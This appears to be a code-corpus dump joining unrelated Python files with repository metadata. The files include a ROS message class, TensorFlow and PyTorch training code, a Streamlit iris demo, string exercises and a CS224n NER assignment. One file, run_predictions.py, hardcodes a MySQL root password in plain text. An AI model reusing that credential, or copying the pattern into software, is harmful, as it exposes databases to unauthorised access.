super(GetAnalogIORequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.port_num is None:
self.port_num = 0
else:
self.port_num = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_get_struct_h().pack(self.port_num))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 2
(self.port_num,) = _get_struct_h().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_get_struct_h().pack(self.port_num))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 2
(self.port_num,) = _get_struct_h().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_h = None
def _get_struct_h():
global _struct_h
if _struct_h is None:
_struct_h = struct.Struct("<h")
return _struct_h
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from xarm_msgs/GetAnalogIOResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class GetAnalogIOResponse(genpy.Message):
_md5sum = "14b69cf7f6c4030ec842bfd1c9d215d0"
_type = "xarm_msgs/GetAnalogIOResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
float32 analog_value
int16 ret
string message
"""
__slots__ = ['analog_value','ret','message']
_slot_types = ['float32','int16','string']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
analog_value,ret,message
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetAnalogIOResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.analog_value is None:
self.analog_value = 0.
if self.ret is None:
self.ret = 0
if self.message is None:
self.message = ''
else:
self.analog_value = 0.
self.ret = 0
self.message = ''
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_fh().pack(_x.analog_value, _x.ret))
_x = self.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 6
(_x.analog_value, _x.ret,) = _get_struct_fh().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message = str[start:end].decode('utf-8')
else:
self.message = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_fh().pack(_x.analog_value, _x.ret))
_x = self.message
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 6
(_x.analog_value, _x.ret,) = _get_struct_fh().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.message = str[start:end].decode('utf-8')
else:
self.message = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_fh = None
def _get_struct_fh():
global _struct_fh
if _struct_fh is None:
_struct_fh = struct.Struct("<fh")
return _struct_fh
class GetAnalogIO(object):
_type = 'xarm_msgs/GetAnalogIO'
_md5sum = 'be8d9a2c0ed50c727cbf098654568f97'
_request_class = GetAnalogIORequest
_response_class = GetAnalogIOResponse
| [
"makihara@ms.esys.tsukuba.ac.jp"
] | makihara@ms.esys.tsukuba.ac.jp |
a99c2a5837c537a407dd87963f6047684fc42131 | 60b52f75e2b0712738d5ad2f9c2113e4d8016c1e | /Chapter01/Logistic regression model building/logistic.py | 9173bc687a2a76562df6ba94ab599b0b78764c5a | [
"MIT"
] | permissive | PacktPublishing/Hands-On-Deep-Learning-with-TensorFlow | b63b40140882762841403467f9255612972f7ec7 | c81fdc1edf8f2275ea76a9900c92e7fae0ddf6ed | refs/heads/master | 2023-01-24T19:44:40.191675 | 2023-01-24T11:07:02 | 2023-01-24T11:07:02 | 100,028,897 | 96 | 77 | null | null | null | null | UTF-8 | Python | false | false | 3,308 | py | import tensorflow as tf
import numpy as np
%autoindent
try:
from tqdm import tqdm
except ImportError:
def tqdm(x, *args, **kwargs):
return x
# Set random seed
np.random.seed(0)
# Load data
data = np.load('data_with_labels.npz')
train = data['arr_0']/255.
labels = data['arr_1']
# Look at some data
print(train[0])
print(labels[0])
# If you have matplotlib installed
import matplotlib.pyplot as plt
plt.ion()
# Let's look at a subplot of one of A in each font
f, plts = plt.subplots(5, sharex=True)
c = 91
for i in range(5):
plts[i].pcolor(train[c + i * 558],
cmap=plt.cm.gray_r)
def to_onehot(labels,nclasses = 5):
'''
Convert labels to "one-hot" format.
>>> a = [0,1,2,3]
>>> to_onehot(a,5)
array([[ 1., 0., 0., 0., 0.],
[ 0., 1., 0., 0., 0.],
[ 0., 0., 1., 0., 0.],
[ 0., 0., 0., 1., 0.]])
'''
outlabels = np.zeros((len(labels),nclasses))
for i,l in enumerate(labels):
outlabels[i,l] = 1
return outlabels
onehot = to_onehot(labels)
# Split data into training and validation
indices = np.random.permutation(train.shape[0])
valid_cnt = int(train.shape[0] * 0.1)
test_idx, training_idx = indices[:valid_cnt],\
indices[valid_cnt:]
test, train = train[test_idx,:],\
train[training_idx,:]
onehot_test, onehot_train = onehot[test_idx,:],\
onehot[training_idx,:]
sess = tf.InteractiveSession()
# These will be inputs
## Input pixels, flattened
x = tf.placeholder("float", [None, 1296])
## Known labels
y_ = tf.placeholder("float", [None,5])
# Variables
W = tf.Variable(tf.zeros([1296,5]))
b = tf.Variable(tf.zeros([5]))
# Just initialize
sess.run(tf.global_variables_initializer())
# Define model
y = tf.nn.softmax(tf.matmul(x,W) + b)
### End model specification, begin training code
# Climb on cross-entropy
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(
logits = y + 1e-50, labels = y_))
# How we train
train_step = tf.train.GradientDescentOptimizer(
0.02).minimize(cross_entropy)
# Define accuracy
correct_prediction = tf.equal(tf.argmax(y,1),
tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(
correct_prediction, "float"))
# Actually train
epochs = 1000
train_acc = np.zeros(epochs//10)
test_acc = np.zeros(epochs//10)
for i in tqdm(range(epochs)):
# Record summary data, and the accuracy
if i % 10 == 0:
# Check accuracy on train set
A = accuracy.eval(feed_dict={
x: train.reshape([-1,1296]),
y_: onehot_train})
train_acc[i//10] = A
# And now the validation set
A = accuracy.eval(feed_dict={
x: test.reshape([-1,1296]),
y_: onehot_test})
test_acc[i//10] = A
train_step.run(feed_dict={
x: train.reshape([-1,1296]),
y_: onehot_train})
# Notice that accuracy flattens out
print(train_acc[-1])
print(test_acc[-1])
# Plot the accuracy curves
plt.figure(figsize=(6,6))
plt.plot(train_acc,'bo')
plt.plot(test_acc,'rx')
# Look at a subplot of the weights for each font
f, plts = plt.subplots(5, sharex=True)
for i in range(5):
plts[i].pcolor(W.eval()[:,i].reshape([36,36]))
| [
"noreply@github.com"
] | noreply@github.com |
123d18a02f05d17059d952a8169d5b7d13b2133e | 61bd4a9dfd606b3c9efd52f23848b7329b18a909 | /Pythonscripts/run_predictions.py | 071dc31901d1c69daae74de43dde6e21c174c466 | [] | no_license | philmcc/aistocks | e9e85dc65e5439793cc5caa4d851a9149ff762a1 | 0706ce7d63db271ee807cc1f6dba8cd178223612 | refs/heads/master | 2021-01-10T05:36:33.736881 | 2016-09-06T13:53:03 | 2016-09-06T13:53:03 | 46,048,154 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,673 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import MySQLdb as mdb
from pyfann import libfann
from datetime import date
from network_functions import save_prediction
mydate = date.today()
con = None
con = mdb.connect('localhost', 'root',
'fil1202job', 'stock');
with con:
cur = con.cursor(mdb.cursors.DictCursor)
cur1 = con.cursor()
cur2 = con.cursor()
#
# Get a list of all networks
#
cur.execute("SELECT a.id, a.group, b.ticker, b.predict_data, a.net_file FROM `network`.`network` a, network.net_group b where a.group = b.id;")
rows = cur.fetchall()
for row in rows:
#
# For each network get the training data - only most recent data at the moment
#
#seldate = "select latest_prediction from network.network where id = " + str(row["id"])
#cur2.execute(seldate)
#latestdate = cur2.fetchone()
#latestdate1 = latestdate[0]
#print latestdate1
cur1.execute(row["predict_data"])
for row1 in cur1.fetchall():
#
# Extract Date
#
mydate = row1[(len(row1) - 1)]
row1b = list(row1)
del row1b[(len(row1b) - 1)]
#
# Set up network
#
ann = libfann.neural_net()
ann.create_from_file(row["net_file"])
#
# Run Prediction
#
print ann.run(row1b)
prediction = ann.run(row1b)
prediction = str(prediction).translate(None, '[]')
#
# Store results in db - Function
#
save_prediction(row["id"], mydate, prediction)
| [
"pmcclarence@iparadigms.com"
] | pmcclarence@iparadigms.com |
0f5ed518db714ea344380b6429275fec41ee5e98 | a3d6556180e74af7b555f8d47d3fea55b94bcbda | /chrome/test/webapps/graph_analysis_unittest.py | 8c279f8cf4de227a48180ac060fca8eb86fd07b9 | [
"BSD-3-Clause"
] | permissive | chromium/chromium | aaa9eda10115b50b0616d2f1aed5ef35d1d779d6 | a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c | refs/heads/main | 2023-08-24T00:35:12.585945 | 2023-08-23T22:01:11 | 2023-08-23T22:01:11 | 120,360,765 | 17,408 | 7,102 | BSD-3-Clause | 2023-09-10T23:44:27 | 2018-02-05T20:55:32 | null | UTF-8 | Python | false | false | 4,714 | py | #!/usr/bin/env python3
# Copyright 2021 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import csv
from file_reading import read_actions_file, read_enums_file, read_platform_supported_actions, read_unprocessed_coverage_tests_file
from test_analysis import expand_parameterized_tests, filter_coverage_tests_for_platform, partition_framework_tests_per_platform_combination
from graph_analysis import build_action_node_graph, generate_framework_tests, trim_graph_to_platform_actions
import os
import unittest
from models import ActionNode, CoverageTestsByPlatform, CoverageTestsByPlatformSet, TestPartitionDescription
from models import TestPlatform
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_data")
class GraphAnalysisUnittest(unittest.TestCase):
def test_test_generation(self):
self.maxDiff = None
actions_filename = os.path.join(TEST_DATA_DIR, "test_actions.md")
enums_filename = os.path.join(TEST_DATA_DIR, "test_enums.md")
supported_actions_filename = os.path.join(
TEST_DATA_DIR, "framework_supported_actions.csv")
coverage_filename = os.path.join(TEST_DATA_DIR,
"test_unprocessed_coverage.md")
test_partition = TestPartitionDescription(
action_name_prefixes=set(),
browsertest_dir=os.path.join(TEST_DATA_DIR, "expected_test_txt"),
test_file_prefix="tests_default",
test_fixture="TestName")
with open(actions_filename, "r", encoding="utf-8") as actions_file, \
open(supported_actions_filename, "r", encoding="utf-8") \
as supported_actions_file, \
open (enums_filename, "r", encoding="utf-8") as enums, \
open(coverage_filename, "r", encoding="utf-8") \
as coverage_file:
enums = read_enums_file(enums.readlines())
platform_supported_actions = read_platform_supported_actions(
csv.reader(supported_actions_file, delimiter=','))
(actions, action_base_name_to_default_param) = read_actions_file(
actions_file.readlines(), enums, platform_supported_actions)
required_coverage_tests = read_unprocessed_coverage_tests_file(
coverage_file.readlines(), actions, enums,
action_base_name_to_default_param)
required_coverage_tests = expand_parameterized_tests(
required_coverage_tests)
required_coverage_by_platform: CoverageTestsByPlatform = {}
generated_tests_by_platform: CoverageTestsByPlatform = {}
for platform in TestPlatform:
platform_tests = filter_coverage_tests_for_platform(
required_coverage_tests.copy(), platform)
required_coverage_by_platform[platform] = platform_tests
generated_tests_root_node = ActionNode.CreateRootNode()
build_action_node_graph(generated_tests_root_node,
platform_tests)
trim_graph_to_platform_actions(generated_tests_root_node,
platform)
generated_tests_by_platform[
platform] = generate_framework_tests(
generated_tests_root_node, platform)
required_coverage_by_platform_set: CoverageTestsByPlatformSet = (
partition_framework_tests_per_platform_combination(
generated_tests_by_platform))
for platform_set, tests in required_coverage_by_platform_set.items(
):
expected_filename = os.path.join(
test_partition.browsertest_dir,
test_partition.test_file_prefix)
if len(platform_set) != len(TestPlatform):
for platform in TestPlatform:
if platform in platform_set:
expected_filename += "_" + platform.suffix
expected_filename += ".txt"
with open(expected_filename, "r",
encoding="utf-8") as expected_tests_file:
expected_tests_str = expected_tests_file.read()
actual_tests_str = "\n".join([
test.generate_browsertest(test_partition)
for test in tests
])
self.assertEqual(expected_tests_str, actual_tests_str)
if __name__ == '__main__':
unittest.main()
| [
"chromium-scoped@luci-project-accounts.iam.gserviceaccount.com"
] | chromium-scoped@luci-project-accounts.iam.gserviceaccount.com |
2e897d9ec97d05599a782b93f0e1b52ef8e1ba62 | f9fb4f8073d963c349679e7f40b73dc711160991 | /py-casanova/Lesson2/exo_cc_lesson_2.py | d2dd6e44d1cc887025ca1997ed65bdfb2c64fd21 | [] | no_license | ouedraogoboukary/starter-kit-datascience | 83606196fc19cc3385ba8e846ef3014ff9e0b2e9 | f621d4a1d7826c79c7ebd3a5a07a0138199e6c82 | refs/heads/master | 2020-10-01T01:04:23.460810 | 2017-12-04T22:33:52 | 2017-12-04T22:33:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,621 | py | #! /usr/bin/python3.5
import unittest
# Given a string and a non-negative int n, return a larger string
# that is n copies of the original string.
def string_times(string, n):
if not(isinstance(n, int)):
return "bad argument"
if not(isinstance(string, str)):
return "bad argument"
return n * string
# Given an array of ints, return True if one of the first 4 elements
# in the array is a 9. The array length may be less than 4.
def array_front9(nums):
return(9 in nums[0:4])
# Given a string, return the count of the number of times
# that a substring length 2 appears in the string and also as
# the last 2 chars of the string, so "hixxxhi" yields 1 (we won't count
# the end substring).
# (i.e. prendre les 2 derniers caractères comme pattern)
""" Rq: non glissant (i.e. sans compter les overlaps)
def last2(string):
count = 0
if(string[-2:] in string[0:-2]):
count += 1
return count
"""
""" Rq: non glissant (i.e. sans compter les overlaps)
def last2(string):
return string[0:-2].count(string[-2:])
"""
""" Glissant """
def last2(string):
count = 0
windows = [string[i:i + 2] for i in range(len(string[0:-2]))]
for window in windows:
if(window == string[-2:]):
count += 1
return count
# Write a program that maps a list of words into a list of
# integers representing the lengths of the correponding words.
def length_words(array):
return list(map(lambda x: len(x), array))
# write fizbuzz programm
def fizbuzz():
for i in range(100):
if(i % 15 == 0):
print(i, "fizzbuzz")
if(i % 3 == 0 and i % 15):
print(i, "fizz")
if(i % 5 == 0 and i % 15):
print(i, "buzz")
# Write a function that takes a number and returns a list of its digits.
def number2digits(number):
return [int(d) for d in str(number)]
# Write function that translates a text to Pig Latin and back.
# English is translated to Pig Latin by taking the first letter of every word,
# moving it to the end of the word and adding 'ay'
def pigLatin(text):
out = ""
words = text.split(" ")
for word in words:
wordlist = list(word)
wordlist.append(wordlist[0])
wordlist[0] = ""
wordlist = "".join(wordlist)
out += str(wordlist) + "ay" + " "
return out.lower().rstrip().capitalize()
# Here's our "unit tests".
class Lesson1Tests(unittest.TestCase):
def testArrayFront9(self):
self.assertEqual(array_front9([1, 2, 9, 3, 4]), True)
self.assertEqual(array_front9([1, 2, 3, 4, 9]), False)
self.assertEqual(array_front9([1, 2, 3, 4, 5]), False)
def testStringTimes(self):
self.assertEqual(string_times('Hel', 2), 'HelHel')
self.assertEqual(string_times('Toto', 1), 'Toto')
self.assertEqual(string_times('P', 4), 'PPPP')
def testLast2(self):
self.assertEqual(last2('hixxhi'), 1)
self.assertEqual(last2('xaxxaxaxx'), 1)
self.assertEqual(last2('axxxaaxx'), 2)
def testLengthWord(self):
self.assertEqual(length_words(['hello', 'toto']), [5, 4])
self.assertEqual(length_words(
['s', 'ss', '59fk', 'flkj3']), [1, 2, 4, 5])
def testNumber2Digits(self):
self.assertEqual(number2digits(8849), [8, 8, 4, 9])
self.assertEqual(number2digits(4985098), [4, 9, 8, 5, 0, 9, 8])
def testPigLatin(self):
self.assertEqual(pigLatin("The quick brown fox"),
"Hetay uickqay rownbay oxfay")
def main():
unittest.main()
if __name__ == '__main__':
main()
| [
"pycasa@gmail.com"
] | pycasa@gmail.com |
f789b859c8548d0cde3a2a1d0d92f48e291ed514 | 3d12a844953e83b3ae13b1788fedf8cce5d33de9 | /program.py | a76c6d7312b50ae2c5d070b6cfb746b2b43d1d1e | [] | no_license | karthik0500/analyze | 8cd14ff01d8dea77564ad778cd752823a102fe71 | 9de5da46c994f65a307ca5a98ae45ff64020c614 | refs/heads/main | 2023-06-11T04:36:26.448762 | 2021-07-04T04:36:51 | 2021-07-04T04:36:51 | 382,659,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py |
import streamlit as st
import sklearn
import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.ensemble import RandomForestClassifier
st.write("""Simple Iris Flower Prediction""")
st.sidebar.header('User Input parameter')
def User_Input_Features():
sepal_length = st.sidebar.slider('sepal_length',4.3, 7.9, 5.4)
sepal_width = st.sidebar.slider('sepal_width',3.5, 7.9, 5.4)
petal_length = st.sidebar.slider('petal_length',1.4, 7.9, 5.4)
petal_width = st.sidebar.slider('petal_width',0.2, 7.9, 5.4)
data = { 'sepal_length' :sepal_length ,
'sepal_width':sepal_width,
'petal_length' : petal_length,
'petal_width' : petal_width
}
features = pd.DataFrame(data,index = [0])
return features
df = User_Input_Features()
st.subheader('User Input Parameter')
st.write(df)
iris = datasets.load_iris()
x= iris.data
y = iris.target
classify = RandomForestClassifier()
classify.fit(x,y)
prediction = classify.predict(df)
prediction_probability = classify.predict_proba(df)
st.subheader('class label and their corresponding index number')
st.write(iris.target_names)
st.subheader('Prediction')
st.write(iris.target_names[prediction])
st.subheader('Prediction Probability')
st.write(prediction_probability)
st.bar_chart(prediction_probability)
| [
"noreply@github.com"
] | noreply@github.com |
e15132e5771bf4da3f169285b889ad3627901912 | 63fdf9369b28cf956789a374ab9e237da250ab82 | /forgebox/ftorch/train.py | fc18cc026af955dc054aca3143e6fb4fdc7d2605 | [] | no_license | raynardj/forge | a9fc66a9cc6d08856a2ca83f4c6f6e76058ad8e9 | 81a10c443b31ed13dd615f58a4f322657e656244 | refs/heads/master | 2023-07-06T08:53:14.453836 | 2019-08-26T07:53:27 | 2019-08-26T07:53:27 | 168,506,241 | 7 | 0 | null | 2023-06-22T19:59:32 | 2019-01-31T10:24:54 | Python | UTF-8 | Python | false | false | 2,623 | py | import __main__ as main
from torch.utils.data import DataLoader
from collections import namedtuple
try:
JUPYTER = True if main.get_ipython else False
except:
JUPYTER = False
if JUPYTER: from tqdm import tqdm_notebook as tn
TrainerBatch = namedtuple("TrainerBatch", ("epoch", "i", "data", "trainer"))
from forgebox.train import Trainer as Universal_Trainer
class Trainer(Universal_Trainer):
def __init__(self, dataset, val_dataset=None, batch_size=16, fg=None,
print_on=20, fields=None, is_log=True, shuffle=True, num_workers=4,
conn=None, modelName="model", tryName="try", callbacks=[], val_callbacks=[]):
"""
Pytorch trainer
fields: the fields you choose to print out
is_log: writing a log?
Training:
write action function for a step of training,
assuming a generator will spit out tuple x,y,z in each:
then pass the function to object
t=Trainer(...)
t.train(epochs = 30)
@t.step_train
def action(batch):
x,y,z = batch.data
x,y,z = x.cuda(),y.cuda(),z.cuda()
#optimizer is a global variable, or many different optimizers if you like
sgd.zero_grad()
adam.zero_grad()
# model is a global variable, or many models if you like
y_ = model(x)
y2_ = model_2(z)
...... more param updating details here
return {"loss":loss.data[0],"acc":accuracy.data[0]}
same work for validation:trainer.val_action = val_action
conn: a sql table connection, (sqlalchemy). if assigned value, save the record in the designated sql database;
"""
train_data = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
val_data = DataLoader(val_dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers) if val_dataset else None
train_len = len(train_data)
val_len = len(val_data) if val_data else None
super().__init__(train_data, train_len=train_len, val_data=val_data, val_len=val_len,
fg=fg, print_on=print_on, fields=fields,
is_log=is_log, conn=conn, modelName=modelName,
tryName=tryName, callbacks=callbacks, val_callbacks=val_callbacks
)
| [
"raynard@rasenn.com"
] | raynard@rasenn.com |
cb51efd3406c8c2cc66cb2f9fbe807f889d82670 | ae043a0200f4dc087c30b2cadddc98d63577df71 | /scripts/Rigging/create_Obj.py | 463f6e7ea6ef48ab98c94840416b63b34ab1128b | [] | no_license | RiggerLiuqi/lqMayaScript | b7ba2dfcfc1a3581beedbba6d70ca0e68282cb38 | cb51742fa712b783744e6192f5b29b43155f392d | refs/heads/master | 2022-06-24T04:03:19.898782 | 2020-05-10T18:33:05 | 2020-05-10T18:33:05 | 262,835,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # -*- coding: utf-8 -*-#
# -------------------------------------------------------------------------------#
# .@FileName: create_Obj
# .@Author: CousinRig67
# .@Date: 2020-04-20
# .@Contact: 842076056@qq.com
# -------------------------------------------------------------------------------#
from createObjectAtAvg import createObject
def main(*args):
obj_ui = createObject.craObjAtAvg() | [
"842076056@qq.com"
] | 842076056@qq.com |
709c6e0719bab7bb2ce4a850c3240d1058ed4ca9 | c09545034e6a4c65e88ad5d0d214ce571b8e6ec6 | /jinritoutiao/items.py | f2826f48364055c55b3b98ed4de38e4ed55d1e84 | [] | no_license | hdxj/jinritoutiao | 5757fca221629c70e9261566ae7289c419502f75 | f306aabbd454f3adad8ebc5e1e8ca62d6636a490 | refs/heads/master | 2021-01-20T05:43:57.093773 | 2017-08-26T06:41:18 | 2017-08-26T06:41:18 | 101,467,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JinritoutiaoItem(scrapy.Item):
abstract = scrapy.Field()
article_genre = scrapy.Field()
chinese_tag = scrapy.Field()
label = scrapy.Field()
source = scrapy.Field()
source_url = scrapy.Field()
tag = scrapy.Field()
title = scrapy.Field()
content = scrapy.Field()
time = scrapy.Field()
| [
"lqrschen@163.com"
] | lqrschen@163.com |
da0b836d9ee3e8f5c77c7ae1b030681c959bd465 | 0a4d0925577e77d2fc2f92a572e259fcbd3f0b9f | /assignment3/q1_window.py | 50e0ca73cdf52f1cf62e6f53e081992556f567a4 | [] | no_license | Jacobsolawetz/stanford-cs224n | 7a80c2c89625052771c0ef2c0e64703d34c74358 | 78db134c7cebd8e4afb36b454d522ad99be1561f | refs/heads/master | 2020-04-26T14:21:18.884356 | 2019-03-03T18:02:57 | 2019-03-03T18:02:57 | 173,610,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,404 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Q1: A window into NER
"""
from __future__ import absolute_import
from __future__ import division
import argparse
import sys
import time
import logging
from datetime import datetime
import tensorflow as tf
from util import print_sentence, write_conll
from data_util import load_and_preprocess_data, load_embeddings, read_conll, ModelHelper
from ner_model import NERModel
from defs import LBLS
#from report import Report
logger = logging.getLogger("hw3.q1")
logger.setLevel(logging.DEBUG)
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class Config:
"""Holds model hyperparams and data information.
The config class is used to store various hyperparameters and dataset
information parameters. Model objects are passed a Config() object at
instantiation.
TODO: Fill in what n_window_features should be, using n_word_features and window_size.
"""
n_word_features = 2 # Number of features for every word in the input.
window_size = 1 # The size of the window to use.
### YOUR CODE HERE
n_window_features = 0 # The total number of features used for each window.
### END YOUR CODE
n_classes = 5
dropout = 0.5
embed_size = 50
hidden_size = 200
batch_size = 2048
n_epochs = 10
lr = 0.001
n_window_features = (2 * window_size + 1) * n_word_features
def __init__(self, output_path=None):
if output_path:
# Where to save things.
self.output_path = output_path
else:
self.output_path = "results/window/{:%Y%m%d_%H%M%S}/".format(datetime.now())
self.model_output = self.output_path + "model.weights"
self.eval_output = self.output_path + "results.txt"
self.log_output = self.output_path + "log"
self.conll_output = self.output_path + "window_predictions.conll"
def make_windowed_data(data, start, end, window_size = 1):
"""Uses the input sequences in @data to construct new windowed data points.
TODO: In the code below, construct a window from each word in the
input sentence by concatenating the words @window_size to the left
and @window_size to the right to the word. Finally, add this new
window data point and its label. to windowed_data.
Args:
data: is a list of (sentence, labels) tuples. @sentence is a list
containing the words in the sentence and @label is a list of
output labels. Each word is itself a list of
@n_features features. For example, the sentence "Chris
Manning is amazing" and labels "PER PER O O" would become
([[1,9], [2,9], [3,8], [4,8]], [1, 1, 4, 4]). Here "Chris"
the word has been featurized as "[1, 9]", and "[1, 1, 4, 4]"
is the list of labels.
start: the featurized `start' token to be used for windows at the very
beginning of the sentence.
end: the featurized `end' token to be used for windows at the very
end of the sentence.
window_size: the length of the window to construct.
Returns:
a new list of data points, corresponding to each window in the
sentence. Each data point consists of a list of
@n_window_features features (corresponding to words from the
window) to be used in the sentence and its NER label.
If start=[5,8] and end=[6,8], the above example should return
the list
[([5, 8, 1, 9, 2, 9], 1),
([1, 9, 2, 9, 3, 8], 1),
...
]
"""
windowed_data = []
for sentence, labels in data:
### YOUR CODE HERE (5-20 lines)
for i in range(len(sentence)):
window = sentence[i]
for j in range(window_size):
offset = j + 1
if i - offset < 0:
prior_word = start
else:
prior_word = sentence[i - offset]
if i + offset > len(sentence) - 1:
next_word = end
else:
next_word = sentence[i + offset]
window = prior_word + window
window = window + next_word
windowed_data.append((window,labels[i]))
### END YOUR CODE
return windowed_data
class WindowModel(NERModel):
"""
Implements a feedforward neural network with an embedding layer and
single hidden layer.
This network will predict what label (e.g. PER) should be given to a
given token (e.g. Manning) by using a featurized window around the token.
"""
def add_placeholders(self):
"""Generates placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building and will be fed
data during training. Note that when "None" is in a placeholder's shape, it's flexible
(so we can use different batch sizes without rebuilding the model).
Adds following nodes to the computational graph
input_placeholder: Input placeholder tensor of shape (None, n_window_features), type tf.int32
labels_placeholder: Labels placeholder tensor of shape (None,), type tf.int32
dropout_placeholder: Dropout value placeholder (scalar), type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE (~3-5 lines)
#need to find where n_window_features comes from
self.input_placeholder = tf.placeholder(tf.int32, [None, self.config.n_window_features] )
self.labels_placeholder = tf.placeholder(tf.int32, [None,] )
self.dropout_placeholder = tf.placeholder(tf.float32, shape=())
### END YOUR CODE
def create_feed_dict(self, inputs_batch, labels_batch=None, dropout=1):
"""Creates the feed_dict for the model.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Hint: The keys for the feed_dict should be a subset of the placeholder
tensors created in add_placeholders.
Hint: When an argument is None, don't add it to the feed_dict.
Args:
inputs_batch: A batch of input data.
labels_batch: A batch of label data.
dropout: The dropout rate.
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
### YOUR CODE HERE (~5-10 lines)
feed_dict = {}
if inputs_batch is not None:
feed_dict[self.input_placeholder] = inputs_batch
if labels_batch is not None:
feed_dict[self.labels_placeholder] = labels_batch
if dropout is not None:
feed_dict[self.dropout_placeholder] = dropout
### END YOUR CODE
return feed_dict
def add_embedding(self):
"""Adds an embedding layer that maps from input tokens (integers) to vectors and then
concatenates those vectors:
- Creates an embedding tensor and initializes it with self.pretrained_embeddings.
- Uses the input_placeholder to index into the embeddings tensor, resulting in a
tensor of shape (None, n_window_features, embedding_size).
- Concatenates the embeddings by reshaping the embeddings tensor to shape
(-1, n_window_features * embedding_size). Here -1 means variable length.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: You can use tf.reshape to concatenate the vectors. See following link to understand
what -1 in a shape means.
